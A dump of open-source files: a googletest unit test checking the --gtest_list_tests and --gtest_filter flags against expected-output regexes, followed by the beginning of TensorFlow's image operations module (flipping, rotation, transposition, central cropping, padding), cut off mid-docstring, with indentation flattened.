TestA/1 # GetParam\(\) = two\\nlines
TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
TestB/0 # GetParam\(\) = one line
TestB/1 # GetParam\(\) = two\\nlines
TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
""")
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
""")
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output_re, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output_re: regular expression that matches the expected
output after running command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
if expected_output_re:
self.assert_(
expected_output_re.match(output),
('when %s is %s, the output of "%s" is "%s",\n'
'which does not match regex "%s"' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output,
expected_output_re.pattern)))
else:
self.assert_(
not EXPECTED_OUTPUT_NO_FILTER_RE.match(output),
('when %s is %s, the output of "%s" is "%s"'%
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output)))
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output_re=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output_re=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
|
Dragnalith/googletest
|
refs/heads/master
|
test/gtest_list_tests_unittest.py
|
1898
|
#!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) with the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
import re
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
Abc\.
Xyz
Def
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
TypedTest/1\. # TypeParam = int\s*\*
TestA
TestB
TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
My/TypeParamTest/1\. # TypeParam = int\s*\*
TestA
TestB
My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
MyInstantiation/ValueParamTest\.
TestA/0 # GetParam\(\) = one line
TestA/1 # GetParam\(\) = two\\nlines
TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
TestB/0 # GetParam\(\) = one line
TestB/1 # GetParam\(\) = two\\nlines
TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
""")
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
""")
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output_re, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output_re: regular expression that matches the expected
output after running command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
if expected_output_re:
self.assert_(
expected_output_re.match(output),
('when %s is %s, the output of "%s" is "%s",\n'
'which does not match regex "%s"' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output,
expected_output_re.pattern)))
else:
self.assert_(
not EXPECTED_OUTPUT_NO_FILTER_RE.match(output),
('when %s is %s, the output of "%s" is "%s"'%
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output)))
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output_re=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output_re=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
|
gautam1858/tensorflow
|
refs/heads/master
|
tensorflow/python/ops/image_ops_impl.py
|
2
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of image ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.compat import compat
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_image_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variables
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
ops.NotDifferentiable('RandomCrop')
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable('RGBToHSV')
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable('HSVToRGB')
ops.NotDifferentiable('DrawBoundingBoxes')
ops.NotDifferentiable('SampleDistortedBoundingBox')
ops.NotDifferentiable('SampleDistortedBoundingBoxV2')
# TODO(bsteiner): Implement the gradient function for extract_glimpse
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable('ExtractGlimpse')
ops.NotDifferentiable('NonMaxSuppression')
ops.NotDifferentiable('NonMaxSuppressionV2')
ops.NotDifferentiable('NonMaxSuppressionWithOverlaps')
# pylint: disable=invalid-name
def _assert(cond, ex_type, msg):
"""A polymorphic assert, works with tensors and boolean expressions.
If `cond` is not a tensor, behave like an ordinary assert statement, except
that an empty list is returned. If `cond` is a tensor, return a list
containing a single TensorFlow assert op.
Args:
cond: Something evaluates to a boolean value. May be a tensor.
ex_type: The exception class to use.
msg: The error message.
Returns:
A list, containing at most one assert op.
"""
if _is_tensor(cond):
return [control_flow_ops.Assert(cond, [msg])]
else:
if not cond:
raise ex_type(msg)
else:
return []
def _is_tensor(x):
"""Returns `True` if `x` is a symbolic tensor-like object.
Args:
x: A python object to check.
Returns:
`True` if `x` is a `tf.Tensor` or `tf.Variable`, otherwise `False`.
"""
return isinstance(x, (ops.Tensor, variables.Variable))
def _ImageDimensions(image, rank):
"""Returns the dimensions of an image tensor.
Args:
image: A rank-D Tensor. For 3-D of shape: `[height, width, channels]`.
rank: The expected rank of the image
Returns:
A list corresponding to the dimensions of the
input image. Dimensions that are statically known are python integers,
otherwise they are integer scalar tensors.
"""
if image.get_shape().is_fully_defined():
return image.get_shape().as_list()
else:
static_shape = image.get_shape().with_rank(rank).as_list()
dynamic_shape = array_ops.unstack(array_ops.shape(image), rank)
return [
s if s is not None else d for s, d in zip(static_shape, dynamic_shape)
]
def _Check3DImage(image, require_static=True):
"""Assert that we are working with properly shaped image.
Args:
image: 3-D Tensor of shape [height, width, channels]
require_static: If `True`, requires that all dimensions of `image` are
known and non-zero.
Raises:
ValueError: if `image.shape` is not a 3-vector.
Returns:
An empty list, if `image` has fully defined dimensions. Otherwise, a list
containing an assert op is returned.
"""
try:
image_shape = image.get_shape().with_rank(3)
except ValueError:
raise ValueError(
"'image' (shape %s) must be three-dimensional." % image.shape)
if require_static and not image_shape.is_fully_defined():
raise ValueError("'image' (shape %s) must be fully defined." % image_shape)
if any(x == 0 for x in image_shape):
raise ValueError("all dims of 'image.shape' must be > 0: %s" % image_shape)
if not image_shape.is_fully_defined():
return [
check_ops.assert_positive(
array_ops.shape(image),
["all dims of 'image.shape' "
'must be > 0.'])
]
else:
return []
def _Assert3DImage(image):
"""Assert that we are working with a properly shaped image.
Performs the check statically if possible (i.e. if the shape
is statically known). Otherwise adds a control dependency
to an assert op that checks the dynamic shape.
Args:
image: 3-D Tensor of shape [height, width, channels]
Raises:
ValueError: if `image.shape` is not a 3-vector.
Returns:
If the shape of `image` could be verified statically, `image` is
returned unchanged, otherwise there will be a control dependency
added that asserts the correct dynamic shape.
"""
return control_flow_ops.with_dependencies(
_Check3DImage(image, require_static=False), image)
def _AssertAtLeast3DImage(image):
"""Assert that we are working with a properly shaped image.
Performs the check statically if possible (i.e. if the shape
is statically known). Otherwise adds a control dependency
to an assert op that checks the dynamic shape.
Args:
image: >= 3-D Tensor of size [*, height, width, depth]
Raises:
ValueError: if image.shape is not a [>= 3] vector.
Returns:
If the shape of `image` could be verified statically, `image` is
returned unchanged, otherwise there will be a control dependency
added that asserts the correct dynamic shape.
"""
return control_flow_ops.with_dependencies(
_CheckAtLeast3DImage(image, require_static=False), image)
def _CheckAtLeast3DImage(image, require_static=True):
"""Assert that we are working with properly shaped image.
Args:
image: >= 3-D Tensor of size [*, height, width, depth]
require_static: If `True`, requires that all dimensions of `image` are
known and non-zero.
Raises:
ValueError: if image.shape is not a [>= 3] vector.
Returns:
An empty list, if `image` has fully defined dimensions. Otherwise, a list
containing an assert op is returned.
"""
try:
if image.get_shape().ndims is None:
image_shape = image.get_shape().with_rank(3)
else:
image_shape = image.get_shape().with_rank_at_least(3)
except ValueError:
raise ValueError("'image' must be at least three-dimensional.")
if require_static and not image_shape.is_fully_defined():
raise ValueError('\'image\' must be fully defined.')
if any(x == 0 for x in image_shape):
raise ValueError(
'all dims of \'image.shape\' must be > 0: %s' % image_shape)
if not image_shape.is_fully_defined():
return [
check_ops.assert_positive(
array_ops.shape(image),
["all dims of 'image.shape' "
'must be > 0.'])
]
else:
return []
def fix_image_flip_shape(image, result):
"""Set the shape to 3 dimensional if we don't know anything else.
Args:
image: original image size
result: flipped or transformed image
Returns:
An image whose shape is at least None,None,None.
"""
image_shape = image.get_shape()
if image_shape == tensor_shape.unknown_shape():
result.set_shape([None, None, None])
else:
result.set_shape(image_shape)
return result
@tf_export('image.random_flip_up_down')
def random_flip_up_down(image, seed=None):
"""Randomly flips an image vertically (upside down).
With a 1 in 2 chance, outputs the contents of `image` flipped along the first
dimension, which is `height`. Otherwise output the image as-is.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
return _random_flip(image, 0, seed, 'random_flip_up_down')
@tf_export('image.random_flip_left_right')
def random_flip_left_right(image, seed=None):
"""Randomly flip an image horizontally (left to right).
With a 1 in 2 chance, outputs the contents of `image` flipped along the
second dimension, which is `width`. Otherwise output the image as-is.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
return _random_flip(image, 1, seed, 'random_flip_left_right')
def _random_flip(image, flip_index, seed, scope_name):
"""Randomly (50% chance) flip an image along axis `flip_index`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
flip_index: Dimension along which to flip image. Vertical: 0, Horizontal: 1
seed: A Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
scope_name: Name of the scope in which the ops are added.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
with ops.name_scope(None, scope_name, [image]) as scope:
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
shape = image.get_shape()
if shape.ndims == 3 or shape.ndims is None:
uniform_random = random_ops.random_uniform([], 0, 1.0, seed=seed)
mirror_cond = math_ops.less(uniform_random, .5)
result = control_flow_ops.cond(
mirror_cond,
lambda: array_ops.reverse(image, [flip_index]),
lambda: image,
name=scope
)
return fix_image_flip_shape(image, result)
elif shape.ndims == 4:
batch_size = array_ops.shape(image)[0]
uniform_random = random_ops.random_uniform(
[batch_size], 0, 1.0, seed=seed
)
flips = math_ops.round(
array_ops.reshape(uniform_random, [batch_size, 1, 1, 1])
)
flips = math_ops.cast(flips, image.dtype)
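# Each entry of `flips` is now 0.0 or 1.0 per image in the batch, so the
# blend below picks the flipped copy where flips == 1 and the original
# image where flips == 0, without any data-dependent control flow.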
flipped_input = array_ops.reverse(image, [flip_index + 1])
return flips * flipped_input + (1 - flips) * image
else:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
@tf_export('image.flip_left_right')
def flip_left_right(image):
"""Flip an image horizontally (left to right).
Outputs the contents of `image` flipped along the width dimension.
See also `reverse()`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
return _flip(image, 1, 'flip_left_right')
@tf_export('image.flip_up_down')
def flip_up_down(image):
"""Flip an image vertically (upside down).
Outputs the contents of `image` flipped along the height dimension.
See also `reverse()`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
return _flip(image, 0, 'flip_up_down')
def _flip(image, flip_index, scope_name):
"""Flip an image either horizontally or vertically.
Outputs the contents of `image` flipped along the dimension `flip_index`.
See also `reverse()`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
flip_index: 0 for vertical, 1 for horizontal.
Returns:
A tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
with ops.name_scope(None, scope_name, [image]):
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
shape = image.get_shape()
if shape.ndims == 3 or shape.ndims is None:
return fix_image_flip_shape(image, array_ops.reverse(image, [flip_index]))
elif shape.ndims == 4:
return array_ops.reverse(image, [flip_index+1])
else:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
@tf_export('image.rot90')
def rot90(image, k=1, name=None):
"""Rotate image(s) counter-clockwise by 90 degrees.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
k: A scalar integer. The number of times the image is rotated by 90 degrees.
name: A name for this operation (optional).
Returns:
A rotated tensor of the same type and shape as `image`.
Raises:
ValueError: if the shape of `image` not supported.
"""
with ops.name_scope(name, 'rot90', [image, k]) as scope:
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
k = ops.convert_to_tensor(k, dtype=dtypes.int32, name='k')
k.get_shape().assert_has_rank(0)
k = math_ops.mod(k, 4)
shape = image.get_shape()
if shape.ndims == 3 or shape.ndims is None:
return _rot90_3D(image, k, scope)
elif shape.ndims == 4:
return _rot90_4D(image, k, scope)
else:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
def _rot90_3D(image, k, name_scope):
"""Rotate image counter-clockwise by 90 degrees `k` times.
Args:
image: 3-D Tensor of shape `[height, width, channels]`.
k: A scalar integer. The number of times the image is rotated by 90 degrees.
name_scope: A valid TensorFlow name scope.
Returns:
A 3-D tensor of the same type and shape as `image`.
"""
def _rot90():
return array_ops.transpose(array_ops.reverse_v2(image, [1]), [1, 0, 2])
def _rot180():
return array_ops.reverse_v2(image, [0, 1])
def _rot270():
return array_ops.reverse_v2(array_ops.transpose(image, [1, 0, 2]), [1])
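# Each case expresses the rotation with reverse + transpose: one 90-degree
# counter-clockwise turn reverses the width axis and then swaps the height
# and width axes; 180 degrees simply reverses both spatial axes.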
cases = [(math_ops.equal(k, 1), _rot90), (math_ops.equal(k, 2), _rot180),
(math_ops.equal(k, 3), _rot270)]
result = control_flow_ops.case(
cases, default=lambda: image, exclusive=True, name=name_scope)
result.set_shape([None, None, image.get_shape()[2]])
return result
def _rot90_4D(images, k, name_scope):
"""Rotate batch of images counter-clockwise by 90 degrees `k` times.
Args:
images: 4-D Tensor of shape `[batch, height, width, channels]`.
k: A scalar integer. The number of times the images are rotated by 90
degrees.
name_scope: A valid TensorFlow name scope.
Returns:
A 4-D tensor of the same type and shape as `images`.
"""
def _rot90():
return array_ops.transpose(array_ops.reverse_v2(images, [2]), [0, 2, 1, 3])
def _rot180():
return array_ops.reverse_v2(images, [1, 2])
def _rot270():
return array_ops.reverse_v2(array_ops.transpose(images, [0, 2, 1, 3]), [2])
cases = [(math_ops.equal(k, 1), _rot90), (math_ops.equal(k, 2), _rot180),
(math_ops.equal(k, 3), _rot270)]
result = control_flow_ops.case(
cases, default=lambda: images, exclusive=True, name=name_scope)
shape = result.get_shape()
result.set_shape([shape[0], None, None, shape[3]])
return result
@tf_export(v1=['image.transpose', 'image.transpose_image'])
def transpose_image(image):
return transpose(image=image, name=None)
@tf_export('image.transpose', v1=[])
def transpose(image, name=None):
"""Transpose image(s) by swapping the height and width dimension.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
name: A name for this operation (optional).
Returns:
If `image` was 4-D, a 4-D float Tensor of shape
`[batch, width, height, channels]`
If `image` was 3-D, a 3-D float Tensor of shape
`[width, height, channels]`
Raises:
ValueError: if the shape of `image` not supported.
"""
with ops.name_scope(name, 'transpose', [image]):
image = ops.convert_to_tensor(image, name='image')
image = _AssertAtLeast3DImage(image)
shape = image.get_shape()
if shape.ndims == 3 or shape.ndims is None:
return array_ops.transpose(image, [1, 0, 2], name=name)
elif shape.ndims == 4:
return array_ops.transpose(image, [0, 2, 1, 3], name=name)
else:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
@tf_export('image.central_crop')
def central_crop(image, central_fraction):
"""Crop the central region of the image(s).
Remove the outer parts of an image but retain the central region of the image
along each dimension. If we specify central_fraction = 0.5, this function
returns the region marked with "X" in the below diagram.
     --------
    |        |
    |  XXXX  |
    |  XXXX  |
    |        |   where "X" is the central 50% of the image.
     --------
This function works on either a single image (`image` is a 3-D Tensor), or a
batch of images (`image` is a 4-D Tensor).
Args:
image: Either a 3-D float Tensor of shape [height, width, depth], or a 4-D
Tensor of shape [batch_size, height, width, depth].
    central_fraction: float (0, 1], fraction of the image to retain along each
      spatial dimension (height and width).
Raises:
    ValueError: if central_fraction is not within (0, 1].
Returns:
3-D / 4-D float Tensor, as per the input.
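  For example, a usage sketch (illustrative only; assumes the usual
  `import tensorflow as tf` and a dummy tensor standing in for real image data):
  ```python
  image = tf.zeros([100, 100, 3])  # [height, width, channels]
  cropped = tf.image.central_crop(image, central_fraction=0.5)
  # `cropped` has shape [50, 50, 3]: the central 50% along height and width.
  ```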
"""
with ops.name_scope(None, 'central_crop', [image]):
image = ops.convert_to_tensor(image, name='image')
if central_fraction <= 0.0 or central_fraction > 1.0:
raise ValueError('central_fraction must be within (0, 1]')
if central_fraction == 1.0:
return image
_AssertAtLeast3DImage(image)
rank = image.get_shape().ndims
if rank != 3 and rank != 4:
raise ValueError('`image` should either be a Tensor with rank = 3 or '
'rank = 4. Had rank = {}.'.format(rank))
# Helper method to return the `idx`-th dimension of `tensor`, along with
# a boolean signifying if the dimension is dynamic.
def _get_dim(tensor, idx):
static_shape = tensor.get_shape().dims[idx].value
if static_shape is not None:
return static_shape, False
return array_ops.shape(tensor)[idx], True
# Get the height, width, depth (and batch size, if the image is a 4-D
# tensor).
if rank == 3:
img_h, dynamic_h = _get_dim(image, 0)
img_w, dynamic_w = _get_dim(image, 1)
img_d = image.get_shape()[2]
else:
img_bs = image.get_shape()[0]
img_h, dynamic_h = _get_dim(image, 1)
img_w, dynamic_w = _get_dim(image, 2)
img_d = image.get_shape()[3]
# Compute the bounding boxes for the crop. The type and value of the
# bounding boxes depend on the `image` tensor's rank and whether / not the
# dimensions are statically defined.
if dynamic_h:
img_hd = math_ops.to_double(img_h)
bbox_h_start = math_ops.to_int32((img_hd - img_hd * central_fraction) / 2)
else:
img_hd = float(img_h)
bbox_h_start = int((img_hd - img_hd * central_fraction) / 2)
if dynamic_w:
img_wd = math_ops.to_double(img_w)
bbox_w_start = math_ops.to_int32((img_wd - img_wd * central_fraction) / 2)
else:
img_wd = float(img_w)
bbox_w_start = int((img_wd - img_wd * central_fraction) / 2)
bbox_h_size = img_h - bbox_h_start * 2
bbox_w_size = img_w - bbox_w_start * 2
if rank == 3:
bbox_begin = array_ops.stack([bbox_h_start, bbox_w_start, 0])
bbox_size = array_ops.stack([bbox_h_size, bbox_w_size, -1])
else:
bbox_begin = array_ops.stack([0, bbox_h_start, bbox_w_start, 0])
bbox_size = array_ops.stack([-1, bbox_h_size, bbox_w_size, -1])
image = array_ops.slice(image, bbox_begin, bbox_size)
# Reshape the `image` tensor to the desired size.
if rank == 3:
image.set_shape([
None if dynamic_h else bbox_h_size,
None if dynamic_w else bbox_w_size,
img_d
])
else:
image.set_shape([
img_bs,
None if dynamic_h else bbox_h_size,
None if dynamic_w else bbox_w_size,
img_d
])
return image
@tf_export('image.pad_to_bounding_box')
def pad_to_bounding_box(image, offset_height, offset_width, target_height,
target_width):
"""Pad `image` with zeros to the specified `height` and `width`.
Adds `offset_height` rows of zeros on top, `offset_width` columns of
zeros on the left, and then pads the image on the bottom and right
with zeros until it has dimensions `target_height`, `target_width`.
This op does nothing if `offset_*` is zero and the image already has size
`target_height` by `target_width`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
offset_height: Number of rows of zeros to add on top.
offset_width: Number of columns of zeros to add on the left.
target_height: Height of output image.
target_width: Width of output image.
Returns:
If `image` was 4-D, a 4-D float Tensor of shape
`[batch, target_height, target_width, channels]`
If `image` was 3-D, a 3-D float Tensor of shape
`[target_height, target_width, channels]`
Raises:
ValueError: If the shape of `image` is incompatible with the `offset_*` or
`target_*` arguments, or either `offset_height` or `offset_width` is
negative.
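  For example, a sketch of padding a single image (illustrative values; assumes
  `import tensorflow as tf`):
  ```python
  image = tf.ones([32, 32, 3])
  padded = tf.image.pad_to_bounding_box(image, offset_height=4, offset_width=4,
                                        target_height=40, target_width=40)
  # `padded` has shape [40, 40, 3]: 4 rows/columns of zeros are added on the
  # top/left and 4 on the bottom/right.
  ```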
"""
with ops.name_scope(None, 'pad_to_bounding_box', [image]):
image = ops.convert_to_tensor(image, name='image')
is_batch = True
image_shape = image.get_shape()
if image_shape.ndims == 3:
is_batch = False
image = array_ops.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = array_ops.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image_shape.ndims != 4:
raise ValueError('\'image\' must have either 3 or 4 dimensions.')
assert_ops = _CheckAtLeast3DImage(image, require_static=False)
batch, height, width, depth = _ImageDimensions(image, rank=4)
after_padding_width = target_width - offset_width - width
after_padding_height = target_height - offset_height - height
assert_ops += _assert(offset_height >= 0, ValueError,
'offset_height must be >= 0')
assert_ops += _assert(offset_width >= 0, ValueError,
'offset_width must be >= 0')
assert_ops += _assert(after_padding_width >= 0, ValueError,
'width must be <= target - offset')
assert_ops += _assert(after_padding_height >= 0, ValueError,
'height must be <= target - offset')
image = control_flow_ops.with_dependencies(assert_ops, image)
# Do not pad on the depth dimensions.
paddings = array_ops.reshape(
array_ops.stack([
0, 0, offset_height, after_padding_height, offset_width,
after_padding_width, 0, 0
]), [4, 2])
padded = array_ops.pad(image, paddings)
padded_shape = [
None if _is_tensor(i) else i
for i in [batch, target_height, target_width, depth]
]
padded.set_shape(padded_shape)
if not is_batch:
padded = array_ops.squeeze(padded, axis=[0])
return padded
@tf_export('image.crop_to_bounding_box')
def crop_to_bounding_box(image, offset_height, offset_width, target_height,
target_width):
"""Crops an image to a specified bounding box.
This op cuts a rectangular part out of `image`. The top-left corner of the
returned image is at `offset_height, offset_width` in `image`, and its
lower-right corner is at
`offset_height + target_height, offset_width + target_width`.
Args:
image: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
offset_height: Vertical coordinate of the top-left corner of the result in
the input.
offset_width: Horizontal coordinate of the top-left corner of the result in
the input.
target_height: Height of the result.
target_width: Width of the result.
Returns:
If `image` was 4-D, a 4-D float Tensor of shape
`[batch, target_height, target_width, channels]`
If `image` was 3-D, a 3-D float Tensor of shape
`[target_height, target_width, channels]`
Raises:
ValueError: If the shape of `image` is incompatible with the `offset_*` or
`target_*` arguments, or either `offset_height` or `offset_width` is
negative, or either `target_height` or `target_width` is not positive.
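  For example, a sketch that cuts a 32x32 window out of a larger image
  (illustrative values; assumes `import tensorflow as tf`):
  ```python
  image = tf.zeros([64, 64, 3])
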